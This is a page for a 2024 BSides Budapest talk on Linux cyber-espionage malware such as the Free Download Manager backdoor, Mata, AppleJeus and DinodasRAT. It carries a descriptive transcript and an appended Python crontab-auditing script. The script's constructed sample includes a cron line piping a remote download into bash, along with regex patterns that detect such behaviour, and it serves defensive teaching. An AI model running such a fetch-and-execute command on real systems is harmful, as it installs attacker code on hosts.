
Linux Under Siege: Analyzing the Latest Cyber Espionage Tactics and Malware Trends

BSides Budapest · 2024 · 27:38 · 1.2K views · Published 2025-01 · Watch on YouTube ↗
About this talk
Marc Rivero Lopez examines the growing threat landscape targeting Linux systems, covering major campaigns including AppleJeus and DTrack by the Lazarus Group, the multiplatform Mata framework, and supply-chain attacks like the XZ Utils backdoor. The talk analyzes infection vectors, threat actor tactics, and the evolution of malware affecting Linux infrastructure across enterprises and critical systems.
Original YouTube description
Marc Rivero Lopez - Linux Under Siege: Analyzing the Latest Cyber Espionage Tactics and Malware Trends. This presentation was held at #BSidesBUD2024 IT security conference on 23rd May 2024. In 2023, cybersecurity research shed light on the increasing targeting of Linux systems. The AppleJeus campaign by the Lazarus Group, highlighted by Volexity and Microsoft, marks a tactical evolution with new malware impacting Linux and macOS, focusing on cryptocurrency theft. The DTrack campaign, a branch of Lazarus, represents a significant development in diverse attacks including ransomware and espionage malware. This campaign has evolved over nearly a decade, expanding knowledge about attacker commands and associated https://bsidesbud.com All rights reserved. #BSidesBUD2024 #linux #lazarus
Transcript [en]

Nice, okay, let's start. Sorry for my voice, last week I was really sick and I'm still recovering, but I hope everyone can hear me. My name is Marc, I'm coming from Spain, from Barcelona, and the idea of the presentation is to showcase to everyone some threats around the Linux ecosystem. So, just to make a little survey: who is using Linux as a primary system here? Hands up. macOS? Windows? And for the people that are using Linux, are you using an antivirus on the system or not? An antivirus, an endpoint solution, any security? No, right? There is no malware for Linux, who cares. Okay, so let's just start.

Basically I'm part of the GReAT team. We are a distributed team all around the world and we are analyzing threats; historically we uncovered the major cyber threat operations. Check out securelist.com for the latest reports. The most interesting recent one is about Operation Triangulation, a sequence of zero-days targeting the latest updated iPhones; that was really cool. Here are my colleagues who are also contributing, of course, to those investigations. As I said, I'm based in Spain. So when we talk about threats, we talk about these different kinds of things, right? I mean downloaders, exploits, adware, mobile malware, backdoors, phishing, Trojans, right? These are some of the words around the cybersecurity thing and the cyber threat operations. Depending on what you are investigating you will find one or multiple of these words around your investigation, but basically these are the threats around the different operations that we investigate.

If we take a look at the numbers, these are just numbers, it's just to get a measure of what we are talking about. These statistics were collected at the end of December 2023, so I didn't put the statistics for the whole year because we hadn't finished, but we have a few numbers about the different online attacks that we detected: different malicious URLs, mobile malware, ransomware attacks, etc. Just to give a number, we detected close to 700,000 unique Linux malware files targeting that ecosystem, meaning that there is a lot of interest by the threat actors, either crimeware or state-sponsored, to also target that ecosystem. This slide is interesting because I want to make a distinction: when you are investigating something you may believe it could be targeted, you may believe it could be state-sponsored, but at the end of the day what we are seeing is that 80% of the threats are crimeware. When we talk about crimeware we talk about DDoS, stealers, [unclear], cryptojacking, cryptomining, all the stuff that can be collected and sold to other cybercriminals like the initial access brokers, the phishing attacks, the stealers that are selling credentials, blah blah blah, ransomware stuff; all of this is crimeware. Close to 20% are targeted attacks, that means attacks that are prepared for a specific organization, and only 0.1% is APT. So as you can see, sometimes it's hard to find those kinds of attacks because of the numbers compared to what we find about crimeware. So I'm sure that some of you are in the research field; maybe you spend like two weeks investigating something and then you figure out that it was Cobalt Strike. I'm sorry, I mean, sometimes it happens, but it's part of our history.

So I guess we are living in the new era of multiplatform malware. It doesn't matter if you are running macOS, Windows or Linux, we have threats for the three different scenarios. The current APT landscape offers right now malware for the three different platforms; even major APT groups like Lazarus have their own compiled versions for macOS, meaning that they also have interest in users running these kinds of platforms. Even the ransomware groups: LockBit was the first one in history that gave support with its ransomware to the Apple M1 system, so an ARM system is also affected by this. If we take the perspective of an organization, all the confidential data, all the important data, is uploaded at the end of the day to Linux systems. We are talking about virtualization systems, Kubernetes clusters, virtual data centers, blah blah blah; all the web services and important systems are based on Linux, so the Linux ecosystem is a reality for the bad guys.

If we talk about infection vectors, here are a few examples published by the community. We have an excellent research made by the TAG team at Google where they presented a campaign in which a North Korean-speaking group was targeting researchers over the social networks, basically exchanging messages with them in order to infect those people, because usually the researchers have access to really sensitive data and to really cool companies, and that's why we are also a target of the nation-state-sponsored actors. Also we have another example for the GNOME Linux ecosystem, where the bad guys infected some files related to this desktop environment, and basically they had a zero-day targeting people using GNOME. Also the Spanish authorities raised an alert for everyone about the LockBit locker that was distributed after the users fell for phishing attacks. Basically, as the LockBit builder was leaked, anyone can make their own ransomware right now and they can create their own compiled builds, and that's why we are seeing a lot of low-tier criminals that are using leaked builders of ransomware families to also create their own build business.

Also we have a campaign that I will explain right now, today; it's about the Free Download Manager, a campaign that we detected that infected millions of users worldwide for years. And there is also another interesting campaign where they used fake PoC exploits on GitHub, pushing malware for Windows and Linux. If you want to follow this in MITRE you can use these TTP IDs. So, what happens every time the industry suffers a supply chain attack? Recently we could see this XZ Utils package that was infected by, well, we still don't know the bad guy behind it, but basically they were preparing that campaign for years and they managed to include the package in some of the major Linux systems. So we had the package available on Debian testing, and luckily one engineer from Microsoft, because their connection to the server was a few seconds late, managed to discover one of the latest and major threats in our industry. They managed to backdoor one of the main packages used to compress files in a Linux system. So the supply chain attacks are really dangerous and we have to take care if we use it in our organization.

So this is a case that we discovered, the Free Download Manager. Basically we figured out that a few rare domains were available and these domains were similar to the ones created by a domain generation algorithm, and we decided to investigate a little bit what was going on behind those new domains available for everyone. So basically what we discovered is that one of the popular free download managers for Linux was infected. We still don't know how this happened, because the first, or the patient zero, for this was like many years ago, and basically we also found posts on Reddit and other forums from people that were discussing this, but they didn't know that they were discussing the malware itself; they were like blaming the community about the Free Download Manager that was not working, or some [unclear] that were not available. And the thing is that the bad guys managed to modify the official website of Free Download Manager to redirect some users; of course, because they had like a special fingerprint, like they were coming from specific countries or they were coming from specific operating systems, for some of them the page just offered the backdoored version of the Free Download Manager. That is quite dangerous to investigate, and it's quite hard to investigate, because you have to fulfil certain characteristics in order to get the official malware.

So basically this threat starts with configuring a cron on the system that will be checking every time if the system has certain things like new passwords or new configuration files in order to be ingested by the campaign. And what they also deployed to the system was a bash stealer that was checking for certain files on the system like Opera passwords or Chrome passwords or Google Cloud passwords or Azure passwords, basically all the kinds of wallets and password files that we have stored in our Linux systems as configuration files because we need to access those platforms. This bash stealer was stealing all of these credentials and sending them to the attackers in order to use them in other operations, like for example the usage of this infrastructure to perform other attacks, or to sell this information to third parties. So basically that was the idea of the campaign. The bash stealer is quite simple, so basically, yes, hello, yes, so basically the bash script looks like this: it will check a lot of files and folders in the system in order to just copy all of those files, compress the files and send them back to the server.

Another interesting story is about the Mata framework. Mata is a multiplatform framework that has support for Windows, Linux and macOS, and basically Mata is tied to the Lazarus APT group. It was discovered around 2018, and it is an advanced malware framework that was being used to aggressively infiltrate corporate entities around the world. The malware framework possesses several components; as I said it has support for Windows, Linux and macOS. The framework has different tooling available: a loader, an orchestrator; it has support for plugins so you can extend the functionalities of the framework, and it has support for Linux, macOS and Windows. And it uses historical tools like socat, which is maybe more used for system administration and also for pentesting, but these guys also included a modified version of socat to be used in their operations. As victimology we can find really interesting targets including internet service providers, big e-commerce websites, defense contractors in Europe and also software development companies; so companies that have really sensitive data around them. This is the framework, or the architecture, for the Windows version, just to make sure that you guys understand the capabilities of the Mata framework. So we are talking about a complex architecture that has different capabilities for the attackers, and the idea is that they have like a platform that they can use to do multiple operations on big companies. The Mata framework can be run independently, but they can also connect different Mata framework scenarios using what they call MataNet, which is a network architecture to also communicate between Mata servers. So basically they have capabilities to use web proxies, to also use TCP connections to send and get files; they can also use different plugins to, for example, modify or get files on the system. So basically they can do whatever they want, controlling the machine remotely with Mata. So during the investigation we found a bundle package that contained the whole ecosystem of Mata; we are talking about all the plugins and all the files related to the Windows versions, but we also uncovered a version working for Linux.

The Linux version contained different exploits for the Atlassian suite, so basically what we assess is that they were also exploiting Atlassian servers in order to deploy Mata, or once they had access to the company, if they found an internal server running Atlassian, they exploited the service to infect the server with the Mata backdoor. As I said, they also used tools like socat to hide the connections internally. The functionality of the Linux version is to run as a daemon, and also they have utilities like a process checker to check if the framework is running and, if not, launch it, in case for whatever reason the process is suspended on the system. It has the ability to also work with IoT devices and router systems in order to infect them and be, let's say, under the radar for more time. It has different plugins; the Linux version is not as capable as the Windows one because of the architecture, but it has really interesting features like managing files, managing processes, also testing plugins, and also doing reverse connections to the system. Also, analyzing the bundle package we found a version for macOS. Basically what Lazarus did is to backdoor one of the tools that is used to have like an OTP software on the desktop to manage your OTP codes, basically to access your favorite services like Google Cloud or any of the services that allow two-factor authentication, and we found out that the application was backdoored by Mata.

When we talk about the attribution, how we tied it to Lazarus is because they were using two unique files, represented here with a hex view; basically we found that the bad guy reused some of the files used by Lazarus, and that's how we made the first attribution to the group. And the other one is because of the configuration file: basically Mata is using the same config structure, so we know that the same development team is behind the malware. I don't know if you are aware of this, but Lazarus has like two groups. One of them is the one that we know to be conducting APT campaigns all around the world to infect different interesting companies, and the other one is what we call BlueNoroff, which is like a subdivision whose main purpose is to get money, for example from cryptocurrency and this kind of stuff, in order to fund, or self-fund, their own operations, because at the end, to pay developers, to pay infrastructure, to pay resources, you need money. So you have a subdivision that is getting money for you; you are a really proficient group, and that's why there is a sub-group of Lazarus doing that.

So AppleJeus is another example of campaigns that are targeting not only Windows but Linux and macOS systems. Basically what this campaign does is to modify, well, it's a fake application that the user will be using to work with his exchange, and basically what the application will do is to steal the wallet from the user and send it back to the Lazarus guys in order to steal all the money. Basically this happened with Lazarus multiple times. So basically we made the attribution because AppleJeus for the Linux and macOS version was reusing the same servers as the Windows version, so it's common for the groups to reuse infrastructure; they were using the same key to encrypt and decrypt the data. And the AppleJeus sample had functionalities like to sleep, to be dormant on the system until some interesting event happens in the system; it has a heuristic to be communicating with the command and control server in order to check if there is any new task or order that is prepared by the operator; it has the ability to receive and send files from the system, for the paths on the file system that the malware has access to; and also it has the ability to execute commands directly in the system, for example to delete traces or to also create files on the system during the infection. The macOS version was distributed using malicious apps, for example buying fake domains and then using Google Ads or other techniques to point the users to download the fake applications, but we still don't know how they managed to get the users to use the backdoored version for Linux. So this is a configuration file that we had for AppleJeus; basically we had one hidden app inside the bundle, and every time the user tried to execute the real application they were starting the fake AppleJeus sample in the background.

And the latest campaign is about what we call DinodasRAT. Basically this is a special RAT that targets the Linux ecosystem; it has a lot of functionalities and is really useful for the attackers. The guys behind it only target specifically government entities, so they are interested in targeting the government. It's a binary that is inside an attachment file that is sent through spear phishing, so basically they profile the victim and when they believe they have something for the victim they send spear phishing, and the RAT is inside the spear phishing attachment. The main purpose of the RAT is to collect sensitive information from the victim. Basically every time it infects a computer it starts creating a log file with the date of infection and also does an MD5 hash of the dmidecode command output, which should be unique for the system, and also assigns a random number as an ID in order to identify the victim, in order to do that exfiltration. What DinodasRAT does is to check if it has root permission or not, because basically depending on your permission level you can access some kinds of systems or other paths: if you are not root you cannot access [unclear] or other paths, and if you are root you can, and if you are not root you can access /opt or similar. So basically, just to not waste time trying to read and access the system, and maybe to avoid any alert if the victim has any endpoint solution installed. It has the capability to use proxies, so if the server has any corporate proxy configured, you know, the RAT has support to just pass information using the corporate proxy, and it's using an encryption library that is also used with the popular IM messenger known as Pidgin. So just to make sure that we all understand which capabilities the RAT has: basically it has a file management capability to enumerate the different files in the system but also to upload files to the system, like any other malware, any other utility, any other tool, any other exploit that is interesting for the attacker. It could also log any activity for debugging purposes and to improve the RAT execution in the system. In terms of network, it has the ability to do any kind of thing that we can imagine, like use the proxy or send files, even to measure the speed of the network to make sure that the attacker can calculate how much time he needs to upload any file to the system. And also, the latest thing, it has a needed capability to interact with processes and services in the system: to check which username is used for login, to enumerate processes, to start/stop processes, to start services, to do whatever he needs to interact with the system. So as you can see we can find a complete RAT solution only designed for the Linux ecosystem and only targeting government entities. So as I said, the Linux ecosystem contains all the sensitive and confidential information and that's why the APT, the state-sponsored actors, are really interested in this ecosystem. They are also targeting, of course, managed cloud infrastructure like Azure, Google Cloud or Amazon, but they have a really interesting focus to target these Linux servers. And that's it. I hope you guys were listening. I'm really dying, so apologies for that. Any question? Really happy to...
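The Free Download Manager case described in the talk starts with a cron job that periodically runs a stealer script, and the speaker also notes how hard it is to spot such a thing when users just assume the software is broken. As an added example (not from the talk, the speaker, or Kaspersky's tooling), the script below parses a system crontab and flags entries with the persistence traits a defender would look for: commands living in world-writable temp directories or hidden paths, remote downloads piped straight into a shell, and jobs that silence all their output. The crontab text is a constructed sample; the heuristics and names are this example's own assumptions.

```python
"""Audit system-crontab entries for common persistence patterns.

Added example for the talk's discussion of cron-based persistence; the
sample crontab below is constructed, not taken from any real infection.
"""
import re
from dataclasses import dataclass

# Constructed /etc/crontab-style sample (schedule, user, command).
SAMPLE_CRONTAB = """\
# /etc/crontab (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/10 * * * *    root    /var/tmp/.cache/crond.sh >/dev/null 2>&1
0 3 * * *       backup  /usr/local/bin/backup.sh
* * * * *       www-data curl -s http://example.invalid/u | bash
0 * * * *       root    /usr/bin/apt-get update
"""

# Directories any local user can write to; a scheduled job running from
# one of these is a classic sign of a dropped payload.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Five schedule fields, a user, then the command (system crontab layout).
CRON_RE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.+)$")


@dataclass
class Finding:
    line_no: int
    user: str
    command: str
    reasons: list


def parse_system_crontab(text):
    """Return (line_no, schedule, user, command) tuples, skipping
    comments, blank lines and VAR=value assignments."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):               # @reboot / @daily style
            sched, user, cmd = line.split(None, 2)
        else:
            m = CRON_RE.match(line)
            if not m:
                continue
            sched, user, cmd = m.groups()
        entries.append((n, sched, user, cmd))
    return entries


def analyse_command(cmd):
    """Heuristic checks on a single cron command; returns reason strings."""
    reasons = []
    if any(d in cmd for d in SUSPICIOUS_DIRS):
        reasons.append("runs from world-writable temp directory")
    if re.search(r"/\.[^/\s]+", cmd):          # e.g. /var/tmp/.cache/...
        reasons.append("references hidden path")
    if re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", cmd):
        reasons.append("pipes remote download into a shell")
    if re.search(r">\s*/dev/null\s+2>&1", cmd):
        reasons.append("silences all output")
    return reasons


def audit_crontab(text):
    """Run the heuristics over every entry and collect the flagged ones."""
    findings = []
    for n, sched, user, cmd in parse_system_crontab(text):
        reasons = analyse_command(cmd)
        if reasons:
            findings.append(Finding(n, user, cmd, reasons))
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no} [{f.user}] {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
```

On a real host you would feed it `/etc/crontab`, the files under `/etc/cron.d/`, and each user's crontab (`crontab -l -u USER`, which lacks the user column, so the regex would need one fewer field); a hit is a prompt to inspect the referenced script, not proof of compromise, since legitimate jobs also discard output.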